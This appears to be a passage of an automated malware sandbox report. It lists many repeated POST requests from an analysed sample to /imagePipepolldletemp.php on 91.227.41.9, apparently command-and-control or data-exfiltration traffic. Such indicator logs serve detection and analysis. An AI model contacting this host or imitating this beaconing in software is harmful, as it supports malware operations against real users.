Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1848Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
